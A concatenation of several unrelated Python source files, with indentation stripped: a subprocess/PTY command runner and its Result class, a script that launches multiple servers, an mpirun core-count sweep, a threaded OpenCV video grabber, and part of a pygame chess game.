# TODO: do we ever get those OSErrors on stderr? Feels like we could?
return os.read(self.process.stderr.fileno(), num_bytes)
def _write_proc_stdin(self, data):
# NOTE: parent_fd from os.fork() is a read/write pipe attached to our
# forked process' stdout/stdin, respectively.
fd = self.parent_fd if self.using_pty else self.process.stdin.fileno()
# Try to write, ignoring broken pipes if encountered (implies child
# process exited before the process piping stdin to us finished;
# there's nothing we can do about that!)
try:
return os.write(fd, data)
except OSError as e:
if 'Broken pipe' not in str(e):
raise
def start(self, command, shell, env):
if self.using_pty:
if pty is None: # Encountered ImportError
sys.exit("You indicated pty=True, but your platform doesn't support the 'pty' module!") # noqa
cols, rows = pty_size()
self.pid, self.parent_fd = pty.fork()
# If we're the child process, load up the actual command in a
# shell, just as subprocess does; this replaces our process - whose
# pipes are all hooked up to the PTY - with the "real" one.
if self.pid == 0:
# TODO: both pty.spawn() and pexpect.spawn() do a lot of
# setup/teardown involving tty.setraw, getrlimit, signal.
# Ostensibly we'll want some of that eventually, but if
# possible write tests - integration-level if necessary -
# before adding it!
#
# Set pty window size based on what our own controlling
# terminal's window size appears to be.
# TODO: make subroutine?
winsize = struct.pack('HHHH', rows, cols, 0, 0)
fcntl.ioctl(sys.stdout.fileno(), termios.TIOCSWINSZ, winsize)
# Use execve for bare-minimum "exec w/ variable # args + env"
# behavior. No need for the 'p' (use PATH to find executable)
# for now.
# TODO: see if subprocess is using equivalent of execvp...
os.execve(shell, [shell, '-c', command], env)
else:
self.process = Popen(
command,
shell=True,
executable=shell,
env=env,
stdout=PIPE,
stderr=PIPE,
stdin=PIPE,
)
@property
def process_is_finished(self):
if self.using_pty:
# NOTE:
# https://github.com/pexpect/ptyprocess/blob/4058faa05e2940662ab6da1330aa0586c6f9cd9c/ptyprocess/ptyprocess.py#L680-L687
# implies that Linux "requires" use of the blocking, non-WNOHANG
# version of this call. Our testing doesn't verify this, however,
# so...
# NOTE: It does appear to be totally blocking on Windows, so our
# issue #351 may be totally unsolvable there. Unclear.
pid_val, self.status = os.waitpid(self.pid, os.WNOHANG)
return pid_val != 0
else:
return self.process.poll() is not None
def returncode(self):
if self.using_pty:
# No subprocess.returncode available; use WIFEXITED/WIFSIGNALED to
# determine whch of WEXITSTATUS / WTERMSIG to use.
# TODO: is it safe to just say "call all WEXITSTATUS/WTERMSIG and
# return whichever one of them is nondefault"? Probably not?
# NOTE: doing this in an arbitrary order should be safe since only
# one of the WIF* methods ought to ever return True.
code = None
if os.WIFEXITED(self.status):
code = os.WEXITSTATUS(self.status)
elif os.WIFSIGNALED(self.status):
code = os.WTERMSIG(self.status)
# Match subprocess.returncode by turning signals into negative
# 'exit code' integers.
code = -1 * code
return code
# TODO: do we care about WIFSTOPPED? Maybe someday?
else:
return self.process.returncode
def stop(self):
# No explicit close-out required (so far).
pass
class Result(object):
"""
A container for information about the result of a command execution.
All params are exposed as attributes of the same name and type.
:param str stdout:
The subprocess' standard output.
:param str stderr:
Same as ``stdout`` but containing standard error (unless the process
was invoked via a pty, in which case it will be empty; see
`.Runner.run`.)
:param str command:
The command which was executed.
:param str shell:
The shell binary used for execution.
:param dict env:
The shell environment used for execution. (Default is the empty dict,
``{}``, not ``None`` as displayed in the signature.)
:param int exited:
An integer representing the subprocess' exit/return code.
:param bool pty:
A boolean describing whether the subprocess was invoked with a pty or
not; see `.Runner.run`.
:param tuple hide:
A tuple of stream names (none, one or both of ``('stdout', 'stderr')``)
which were hidden from the user when the generating command executed;
this is a normalized value derived from the ``hide`` parameter of
`.Runner.run`.
For example, ``run('command', hide='stdout')`` will yield a `Result`
where ``result.hide == ('stdout',)``; ``hide=True`` or ``hide='both'``
results in ``result.hide == ('stdout', 'stderr')``; and ``hide=False``
(the default) generates ``result.hide == ()`` (the empty tuple.)
.. note::
`Result` objects' truth evaluation is equivalent to their `.ok`
attribute's value. Therefore, quick-and-dirty expressions like the
following are possible::
if run("some shell command"):
do_something()
else:
handle_problem()
However, remember `Zen of Python #2
<http://zen-of-python.info/explicit-is-better-than-implicit.html#2>`_.
"""
# TODO: inherit from namedtuple instead? heh (or: use attrs from pypi)
def __init__(
self,
stdout="",
stderr="",
command="",
shell="",
env=None,
exited=0,
pty=False,
hide=tuple(),
):
self.stdout = stdout
self.stderr = stderr
self.command = command
self.shell = shell
self.env = {} if env is None else env
self.exited = exited
self.pty = pty
self.hide = hide
@property
def return_code(self):
"""
An alias for ``.exited``.
"""
return self.exited
def __nonzero__(self):
# NOTE: This is the method that (under Python 2) determines Boolean
# behavior for objects.
return self.ok
def __bool__(self):
# NOTE: And this is the Python 3 equivalent of __nonzero__. Much better
# name...
return self.__nonzero__()
def __str__(self):
if self.exited is not None:
desc = "Command exited with status {0}.".format(self.exited)
else:
desc = "Command was not fully executed due to watcher error."
ret = [desc]
for x in ('stdout', 'stderr'):
val = getattr(self, x)
ret.append(u"""=== {0} ===
{1}
""".format(x, val.rstrip()) if val else u"(no {0})".format(x))
return u"\n".join(ret)
def __repr__(self):
# TODO: more? e.g. len of stdout/err? (how to represent cleanly in a
# 'x=y' format like this? e.g. '4b' is ambiguous as to what it
# represents
template = "<Result cmd={0!r} exited={1}>"
return template.format(self.command, self.exited)
@property
def ok(self):
"""
A boolean equivalent to ``exited == 0``.
"""
return self.exited == 0
@property
def failed(self):
"""
The inverse of ``ok``.
I.e., ``True`` if the program exited with a nonzero return code, and
``False`` otherwise.
"""
return not self.ok
def normalize_hide(val):
hide_vals = (None, False, 'out', 'stdout', 'err', 'stderr', 'both', True)
if val not in hide_vals:
err = "'hide' got {0!r} which is not in {1!r}"
raise ValueError(err.format(val, hide_vals))
if val in (None, False):
hide = ()
elif val in ('both', True):
hide = ('stdout', 'stderr')
elif val == 'out':
hide = ('stdout',)
elif val == 'err':
hide = ('stderr',)
else:
hide = (val,)
return hide
|
start_multiple_servers.py
|
#!/bin/python3.6
# -*- coding: utf-8 -*-
#
# MIT License
#
# Copyright (c) 2018 Robert Gustafsson
# Copyright (c) 2018 Andreas Lindhé
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import configparser
from multiprocessing import Process
import server
cfgfile = sys.argv[1]
config = configparser.ConfigParser()
config.read(cfgfile)
for node in config['Nodes']:
ip, port = config['Nodes'][node].split(':')
Process(target=server.main, args=[ip, port, cfgfile]).start()
|
fiber_sweep_cores.py
|
from typing import Optional
import subprocess
import multiprocessing
from functools import partial
def run(
key: str = "fiber_xposition",
value: float = 0,
ncores: int = 6,
):
command = f"mpirun -np {ncores} python fiber.py --{key}={value}"
print(command)
subprocess.call(command, shell=True)
run_fiber_xposition = partial(run, key="fiber_xposition")
run_fiber_angle_deg = partial(run, key="fiber_angle_deg")
if __name__ == "__main__":
ncores_sweep = [1, 2, 4, 8, 16]
p = multiprocessing.Pool(multiprocessing.cpu_count())
p.starmap(run, [("ncores", ncores) for ncores in ncores_sweep])
# p.starmap(run_fiber_angle_deg, ncores=[1, 2, 4, 8, 16])
# p.starmap(run_fiber_angle_deg, fiber_angle_deg=range(10, 30, 5))
# for fiber_xposition in range(-5, 6):
# p = multiprocessing.Process(target=run, args=(fiber_xposition=fiber_xposition))
# p.start()
|
video_thread.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Aug 22 20:00:06 2021
Idea y código original:
https://www.youtube.com/watch?v=sW4CVI51jDY
Clayton Darwin
https://gitlab.com/duder1966/youtube-projects/-/tree/master/
@author: mherrera
"""
import time
import threading
import queue
import cv2
import numpy as np
# ------------------------------
# Camera Tread
# ------------------------------
class VideoThread:
def __init__(self,
video_source=0, # device, stream or file
video_width=640,
video_height=480,
video_frame_rate=10,
buffer_all=False,
video_fourcc=cv2.VideoWriter_fourcc(*"MJPG"),
try_to_reconnect=False):
self.video_source = video_source
self.video_width = video_width
self.video_height = video_height
self.video_frame_rate = video_frame_rate
self.video_fourcc = video_fourcc
self.buffer_all = buffer_all
self.try_to_reconnect = try_to_reconnect
# ------------------------------
# System Variables
# ------------------------------
# buffer setup
self.buffer_length = 5
# control states
self.frame_grab_run = False
self.frame_grab_on = False
# counts and amounts
self.frame_count = 0
self.frames_returned = 0
self.current_frame_rate = 0.0
self.loop_start_time = 0
self.last_try_reconnection_time = 0
# buffer
if self.buffer_all:
self.buffer = queue.Queue(self.buffer_length)
else:
# last frame only
self.buffer = queue.Queue(1)
self.finished = False
# camera setup
self.video_init_wait_time = 0.5
self.resource = cv2.VideoCapture(self.video_source)
self.resource.set(cv2.CAP_PROP_FRAME_WIDTH, self.video_width)
self.resource.set(cv2.CAP_PROP_FRAME_HEIGHT, self.video_height)
self.resource.set(cv2.CAP_PROP_FPS, self.video_frame_rate)
self.resource.set(cv2.CAP_PROP_FOURCC, self.video_fourcc)
time.sleep(self.video_init_wait_time)
if not self.resource.isOpened():
self.resource_available = False
else:
self.resource_available = True
# get the actual cam configuration
self.video_width = int(self.resource.get(cv2.CAP_PROP_FRAME_WIDTH))
self.video_height = int(self.resource.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.video_frame_rate = self.resource.get(cv2.CAP_PROP_FPS)
self.video_fourcc = self.resource.get(cv2.CAP_PROP_FOURCC)
# black frame (filler)
self.black_frame = np.zeros((
self.video_height, self.video_width, 3), np.uint8)
def get_curr_config_fps(self):
return self.video_frame_rate
def get_curr_config_widht(self):
return self.video_width
def get_curr_config_height(self):
return self.video_height
def get_curr_frame_number(self):
return self.frame_count
def reconnect(self):
self.stop()
self.__init__(
buffer_all=self.buffer_all,
video_source=self.video_source,
video_width=self.video_width,
video_height=self.video_height,
video_frame_rate=self.video_frame_rate,
video_fourcc=self.video_fourcc,
try_to_reconnect=self.try_to_reconnect
)
self.start()
print('reconnecting...')
def is_available(self):
return self.resource_available
def start(self):
# set run state
self.frame_grab_run = True
# start thread
self.thread = threading.Thread(target=self.loop)
self.thread.start()
def stop(self):
#print('########## stop')
# set loop kill state
self.frame_grab_run = False
# let loop stop
while self.frame_grab_on:
time.sleep(0.1)
# stop camera if not already stopped
if self.resource:
try:
self.resource.release()
except Exception:
pass
self.resource = None
self.resource_available = False
# drop buffer
self.buffer = None
# set recconection time
self.last_try_reconnection_time = 0
def loop(self):
# load start frame
frame = self.black_frame
if not self.buffer.full():
self.buffer.put(frame, False)
# status
self.frame_grab_on = True
self.loop_start_time = time.time()
# frame rate
local_loop_frame_counter = 0
local_loop_start_time = time.time()
while self.resource.grab():
# external shut down
if not self.frame_grab_run:
break
# true buffered mode (for files, no loss)
if self.buffer_all:
# buffer is full, pause and loop
if self.buffer.full():
time.sleep(1/self.video_frame_rate)
# or load buffer with next frame
else:
grabbed, frame = self.resource.retrieve()
# grabbed, frame = self.resource.read()
if not grabbed:
break
self.buffer.put(frame, False)
self.frame_count += 1
local_loop_frame_counter += 1
# false buffered mode (for camera, loss allowed)
else:
grabbed, frame = self.resource.retrieve()
# grabbed, frame = self.resource.read()
if not grabbed:
break
# open a spot in the buffer
if self.buffer.full():
self.buffer.get()
self.buffer.put(frame, False)
self.frame_count += 1
local_loop_frame_counter += 1
# update frame read rate
if local_loop_frame_counter >= 10:
self.current_frame_rate = \
round(local_loop_frame_counter/
(time.time()-local_loop_start_time), 2)
local_loop_frame_counter = 0
local_loop_start_time = time.time()
# shut down
self.loop_start_time = 0
self.frame_grab_on = False
self.resource_available = False
# self.stop()
def next(self, black=True, wait=0):
# black frame default
if black:
frame = self.black_frame.copy()
# no frame default
else:
frame = None
# # can't open camera by index or loss connection or EOF
# if not self.is_available():
# print('not available:{}'.format(self.video_source))
if not self.finished:
# if self.is_available():
# print('########## self.buffer.qsize():{}'.format(self.buffer.qsize()))
# print('########## self.buffer.empty():{}'.format(self.buffer.empty()))
if self.is_available() or not self.buffer.empty():
try:
#print('\t########## self.buffer.qsize():{}'.format(self.buffer.qsize()))
frame = self.buffer.get(timeout=wait)
self.frames_returned += 1
except queue.Empty:
# print('Queue Empty!')
# print(traceback.format_exc())
pass
# elif not self.buffer.empty():
# print('\t@@@@@@@@@@@@@@@@@ self.is_available() and self.buffer.empty()')
elif self.try_to_reconnect:
if self.last_try_reconnection_time == 0:
self.last_try_reconnection_time = time.time()
else:
if time.time() - self.last_try_reconnection_time >= 10.0:
self.reconnect()
if self.is_available():
self.last_try_reconnection_time = 0
else:
self.last_try_reconnection_time = time.time()
else:
#print('\t########## STOP: self.buffer.qsize():{}'.format(self.buffer.qsize()))
self.finished = True
#self.stop()
#print('\n')
return self.finished, frame
|
Chess-v0.8-threading.py
|
import multiprocessing
import threading
import pygame
from pygame.locals import *
import os
import os.path
import random
import time
from tkinter import Tk
import math
from copy import deepcopy
class Board():
def __init__(self):
self.dark_square = pygame.image.load(os.path.join("textures/dark_square.png")).convert_alpha()
self.dark_square = pygame.transform.scale(self.dark_square, (startup.tile_size, startup.tile_size))
self.dark_square_rect = self.dark_square.get_rect()
self.light_square = pygame.image.load(os.path.join("textures/light_square.png")).convert_alpha()
self.light_square = pygame.transform.scale(self.light_square, (startup.tile_size, startup.tile_size))
self.light_square_rect = self.light_square.get_rect()
def draw_board(self):
for i in range(0, 8):
x = startup.tile_size * i
for j in range(0, 8):
y = startup.tile_size * j
if (i + j) % 2 == 0:
self.light_square_rect.x = x
self.light_square_rect.y = y
tile = self.light_square, self.light_square_rect
else:
self.dark_square_rect.x = x
self.dark_square_rect.y = y
tile = self.dark_square, self.dark_square_rect
startup.screen.blit(tile[0], tile[1])
class Pieces():
def __init__(self):
#[xpos, ypos, alive, unmoved]
self.white_pawns_inf = [[0, 1, True, True], [1, 1, True, True], [2, 1, True, True], [3, 1, True, True], [4, 1, True, True], [5, 1, True, True], [6, 1, True, True], [7, 1, True, True]]
self.white_bishops_inf = [[2, 0, True], [5, 0, True], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False]]
self.white_knights_inf = [[1, 0, True], [6, 0, True], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False]]
self.white_rooks_inf = [[0, 0, True, True], [7, 0, True, True], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False]]
self.white_queens_inf = [[3, 0, True], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False]]
self.white_king_inf = [[4, 0, True, True]]
self.black_pawns_inf = [[0, 6, True, True], [1, 6, True, True], [2, 6, True, True], [3, 6, True, True], [4, 6, True, True], [5, 6, True, True], [6, 6, True, True], [7, 6, True, True]]
self.black_bishops_inf = [[2, 7, True], [5, 7, True], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False]]
self.black_knights_inf = [[6, 7, True], [1, 7, True], [6, 3, False], [0, 3, False], [2, 0, False], [2, 6, False], [6, 2, False], [0, 2, False], [0, 7, False], [0, 7, False]]
self.black_rooks_inf = [[0, 7, True, True], [7, 7, True, True], [2, 0, False, False], [4, 6, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False]]
self.black_queens_inf = [[3, 7, True], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False]]
self.black_king_inf = [[4, 7, True, True]]
self.piece_value_matrix = [[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
self.white_pawn_img = pygame.image.load(os.path.join("textures/white_pawn.png")).convert_alpha()
self.white_pawn_img = pygame.transform.scale(self.white_pawn_img, (startup.tile_size, startup.tile_size))
self.white_pawn_img_rect = self.white_pawn_img.get_rect()
self.white_knight_img = pygame.image.load(os.path.join("textures/white_knight.png")).convert_alpha()
self.white_knight_img = pygame.transform.scale(self.white_knight_img, (startup.tile_size, startup.tile_size))
self.white_knight_img_rect = self.white_knight_img.get_rect()
self.white_bishop_img = pygame.image.load(os.path.join("textures/white_bishop.png")).convert_alpha()
self.white_bishop_img = pygame.transform.scale(self.white_bishop_img, (startup.tile_size, startup.tile_size))
self.white_bishop_img_rect = self.white_bishop_img.get_rect()
self.white_rook_img = pygame.image.load(os.path.join("textures/white_rook.png")).convert_alpha()
self.white_rook_img = pygame.transform.scale(self.white_rook_img, (startup.tile_size, startup.tile_size))
self.white_rook_img_rect = self.white_rook_img.get_rect()
self.white_queen_img = pygame.image.load(os.path.join("textures/white_queen.png")).convert_alpha()
self.white_queen_img = pygame.transform.scale(self.white_queen_img, (startup.tile_size, startup.tile_size))
self.white_queen_img_rect = self.white_queen_img.get_rect()
self.white_king_img = pygame.image.load(os.path.join("textures/white_king.png")).convert_alpha()
self.white_king_img = pygame.transform.scale(self.white_king_img, (startup.tile_size, startup.tile_size))
self.white_king_img_rect = self.white_king_img.get_rect()
self.black_pawn_img = pygame.image.load(os.path.join("textures/black_pawn.png")).convert_alpha()
self.black_pawn_img = pygame.transform.scale(self.black_pawn_img, (startup.tile_size, startup.tile_size))
self.black_pawn_img_rect = self.black_pawn_img.get_rect()
self.black_knight_img = pygame.image.load(os.path.join("textures/black_knight.png")).convert_alpha()
self.black_knight_img = pygame.transform.scale(self.black_knight_img, (startup.tile_size, startup.tile_size))
self.black_knight_img_rect = self.black_knight_img.get_rect()
self.black_bishop_img = pygame.image.load(os.path.join("textures/black_bishop.png")).convert_alpha()
self.black_bishop_img = pygame.transform.scale(self.black_bishop_img, (startup.tile_size, startup.tile_size))
self.black_bishop_img_rect = self.black_bishop_img.get_rect()
self.black_rook_img = pygame.image.load(os.path.join("textures/black_rook.png")).convert_alpha()
self.black_rook_img = pygame.transform.scale(self.black_rook_img, (startup.tile_size, startup.tile_size))
self.black_rook_img_rect = self.black_rook_img.get_rect()
self.black_queen_img = pygame.image.load(os.path.join("textures/black_queen.png")).convert_alpha()
self.black_queen_img = pygame.transform.scale(self.black_queen_img, (startup.tile_size, startup.tile_size))
self.black_queen_img_rect = self.black_queen_img.get_rect()
self.black_king_img = pygame.image.load(os.path.join("textures/black_king.png")).convert_alpha()
self.black_king_img = pygame.transform.scale(self.black_king_img, (startup.tile_size, startup.tile_size))
self.black_king_img_rect = self.black_king_img.get_rect()
self.white_occupation_x = [0, 1, 2, 3, 4, 5, 6, 7, 0, 1, 2, 3, 4, 5, 6, 7]
self.white_occupation_y = [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1]
self.black_occupation_x = [0, 1, 2, 3, 4, 5, 6, 7, 0, 1, 2, 3, 4, 5, 6, 7]
self.black_occupation_y = [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1]
self.en_passant_x_y = [8, 8]
self.half_moves = 0
self.turn_num = 1
def draw_pieces_white(self):
#print("called")
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True:
self.white_pawn_img_rect.x = self.white_pawns_inf[i][0] * startup.tile_size
self.white_pawn_img_rect.y = self.white_pawns_inf[i][1] * startup.tile_size
self.white_pawn_img_rect.y = self.white_pawn_img_rect.y - (self.white_pawn_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.white_pawn_img, self.white_pawn_img_rect)
for i in range(0, 10):
if self.white_bishops_inf[i][2] == True:
self.white_bishop_img_rect.x = self.white_bishops_inf[i][0] * startup.tile_size
self.white_bishop_img_rect.y = self.white_bishops_inf[i][1] * startup.tile_size
self.white_bishop_img_rect.y = self.white_bishop_img_rect.y - (self.white_bishop_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.white_bishop_img, self.white_bishop_img_rect)
for i in range(0, 10):
if self.white_knights_inf[i][2] == True:
self.white_knight_img_rect.x = self.white_knights_inf[i][0] * startup.tile_size
self.white_knight_img_rect.y = self.white_knights_inf[i][1] * startup.tile_size
self.white_knight_img_rect.y = self.white_knight_img_rect.y - (self.white_knight_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.white_knight_img, self.white_knight_img_rect)
for i in range(0, 10):
if self.white_rooks_inf[i][2] == True:
self.white_rook_img_rect.x = self.white_rooks_inf[i][0] * startup.tile_size
self.white_rook_img_rect.y = self.white_rooks_inf[i][1] * startup.tile_size
self.white_rook_img_rect.y = self.white_rook_img_rect.y - (self.white_rook_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.white_rook_img, self.white_rook_img_rect)
for i in range(0, 9):
if self.white_queens_inf[i][2] == True:
self.white_queen_img_rect.x = self.white_queens_inf[i][0] * startup.tile_size
self.white_queen_img_rect.y = self.white_queens_inf[i][1] * startup.tile_size
self.white_queen_img_rect.y = self.white_queen_img_rect.y - (self.white_queen_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.white_queen_img, self.white_queen_img_rect)
if self.white_king_inf[0][2] == True:
self.white_king_img_rect.x = self.white_king_inf[0][0] * startup.tile_size
self.white_king_img_rect.y = self.white_king_inf[0][1] * startup.tile_size
self.white_king_img_rect.y = self.white_king_img_rect.y - (self.white_king_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.white_king_img, self.white_king_img_rect)
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True:
self.black_pawn_img_rect.x = self.black_pawns_inf[i][0] * startup.tile_size
self.black_pawn_img_rect.y = self.black_pawns_inf[i][1] * startup.tile_size
self.black_pawn_img_rect.y = self.black_pawn_img_rect.y - (self.black_pawn_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.black_pawn_img, self.black_pawn_img_rect)
for i in range(0, 10):
if self.black_bishops_inf[i][2] == True:
self.black_bishop_img_rect.x = self.black_bishops_inf[i][0] * startup.tile_size
self.black_bishop_img_rect.y = self.black_bishops_inf[i][1] * startup.tile_size
self.black_bishop_img_rect.y = self.black_bishop_img_rect.y - (self.black_bishop_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.black_bishop_img, self.black_bishop_img_rect)
for i in range(0, 10):
if self.black_knights_inf[i][2] == True:
self.black_knight_img_rect.x = self.black_knights_inf[i][0] * startup.tile_size
self.black_knight_img_rect.y = self.black_knights_inf[i][1] * startup.tile_size
self.black_knight_img_rect.y = self.black_knight_img_rect.y - (self.black_knight_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.black_knight_img, self.black_knight_img_rect)
for i in range(0, 10):
if self.black_rooks_inf[i][2] == True:
self.black_rook_img_rect.x = self.black_rooks_inf[i][0] * startup.tile_size
self.black_rook_img_rect.y = self.black_rooks_inf[i][1] * startup.tile_size
self.black_rook_img_rect.y = self.black_rook_img_rect.y - (self.black_rook_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.black_rook_img, self.black_rook_img_rect)
for i in range(0, 9):
if self.black_queens_inf[i][2] == True:
self.black_queen_img_rect.x = self.black_queens_inf[i][0] * startup.tile_size
self.black_queen_img_rect.y = self.black_queens_inf[i][1] * startup.tile_size
self.black_queen_img_rect.y = self.black_queen_img_rect.y - (self.black_queen_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.black_queen_img, self.black_queen_img_rect)
if self.black_king_inf[0][2] == True:
self.black_king_img_rect.x = self.black_king_inf[0][0] * startup.tile_size
self.black_king_img_rect.y = self.black_king_inf[0][1] * startup.tile_size
self.black_king_img_rect.y = self.black_king_img_rect.y - (self.black_king_img_rect.y * 2) + (startup.screen_height - startup.tile_size)
startup.screen.blit(self.black_king_img, self.black_king_img_rect)
def draw_pieces_black(self):
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True:
self.white_pawn_img_rect.x = self.white_pawns_inf[i][0] * startup.tile_size
self.white_pawn_img_rect.x = self.white_pawn_img_rect.x - (self.white_pawn_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.white_pawn_img_rect.y = self.white_pawns_inf[i][1] * startup.tile_size
startup.screen.blit(self.white_pawn_img, self.white_pawn_img_rect)
for i in range(0, 2):
if self.white_bishops_inf[i][2] == True:
self.white_bishop_img_rect.x = self.white_bishops_inf[i][0] * startup.tile_size
self.white_bishop_img_rect.x = self.white_bishop_img_rect.x - (self.white_bishop_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.white_bishop_img_rect.y = self.white_bishops_inf[i][1] * startup.tile_size
startup.screen.blit(self.white_bishop_img, self.white_bishop_img_rect)
for i in range(0, 2):
if self.white_knights_inf[i][2] == True:
self.white_knight_img_rect.x = self.white_knights_inf[i][0] * startup.tile_size
self.white_knight_img_rect.x = self.white_knight_img_rect.x - (self.white_knight_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.white_knight_img_rect.y = self.white_knights_inf[i][1] * startup.tile_size
startup.screen.blit(self.white_knight_img, self.white_knight_img_rect)
for i in range(0, 2):
if self.white_rooks_inf[i][2] == True:
self.white_rook_img_rect.x = self.white_rooks_inf[i][0] * startup.tile_size
self.white_rook_img_rect.x = self.white_rook_img_rect.x - (self.white_rook_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.white_rook_img_rect.y = self.white_rooks_inf[i][1] * startup.tile_size
startup.screen.blit(self.white_rook_img, self.white_rook_img_rect)
if self.white_queens_inf[0][2] == True:
self.white_queen_img_rect.x = self.white_queens_inf[0][0] * startup.tile_size
self.white_queen_img_rect.x = self.white_queen_img_rect.x - (self.white_queen_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.white_queen_img_rect.y = self.white_queens_inf[0][1] * startup.tile_size
startup.screen.blit(self.white_queen_img, self.white_queen_img_rect)
if self.white_king_inf[0][2] == True:
self.white_king_img_rect.x = self.white_king_inf[0][0] * startup.tile_size
self.white_king_img_rect.x = self.white_king_img_rect.x - (self.white_king_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.white_king_img_rect.y = self.white_king_inf[0][1] * startup.tile_size
startup.screen.blit(self.white_king_img, self.white_king_img_rect)
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True:
self.black_pawn_img_rect.x = self.black_pawns_inf[i][0] * startup.tile_size
self.black_pawn_img_rect.x = self.black_pawn_img_rect.x - (self.black_pawn_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.black_pawn_img_rect.y = self.black_pawns_inf[i][1] * startup.tile_size
startup.screen.blit(self.black_pawn_img, self.black_pawn_img_rect)
for i in range(0, 2):
if self.black_bishops_inf[i][2] == True:
self.black_bishop_img_rect.x = self.black_bishops_inf[i][0] * startup.tile_size
self.black_bishop_img_rect.x = self.black_bishop_img_rect.x - (self.black_bishop_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.black_bishop_img_rect.y = self.black_bishops_inf[i][1] * startup.tile_size
startup.screen.blit(self.black_bishop_img, self.black_bishop_img_rect)
for i in range(0, 2):
if self.black_knights_inf[i][2] == True:
self.black_knight_img_rect.x = self.black_knights_inf[i][0] * startup.tile_size
self.black_knight_img_rect.x = self.black_knight_img_rect.x - (self.black_knight_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.black_knight_img_rect.y = self.black_knights_inf[i][1] * startup.tile_size
startup.screen.blit(self.black_knight_img, self.black_knight_img_rect)
for i in range(0, 2):
if self.black_rooks_inf[i][2] == True:
self.black_rook_img_rect.x = self.black_rooks_inf[i][0] * startup.tile_size
self.black_rook_img_rect.x = self.black_rook_img_rect.x - (self.black_rook_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.black_rook_img_rect.y = self.black_rooks_inf[i][1] * startup.tile_size
startup.screen.blit(self.black_rook_img, self.black_rook_img_rect)
if self.black_queens_inf[0][2] == True:
self.black_queen_img_rect.x = self.black_queens_inf[0][0] * startup.tile_size
self.black_queen_img_rect.x = self.black_queen_img_rect.x - (self.black_queen_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.black_queen_img_rect.y = self.black_queens_inf[0][1] * startup.tile_size
startup.screen.blit(self.black_queen_img, self.black_queen_img_rect)
if self.black_king_inf[0][2] == True:
self.black_king_img_rect.x = self.black_king_inf[0][0] * startup.tile_size
self.black_king_img_rect.x = self.black_king_img_rect.x - (self.black_king_img_rect.x * 2) + (startup.screen_height - startup.tile_size)
self.black_king_img_rect.y = self.black_king_inf[0][1] * startup.tile_size
startup.screen.blit(self.black_king_img, self.black_king_img_rect)
def white_black_occupation(self):
self.white_occupation_x = []
self.white_occupation_y = []
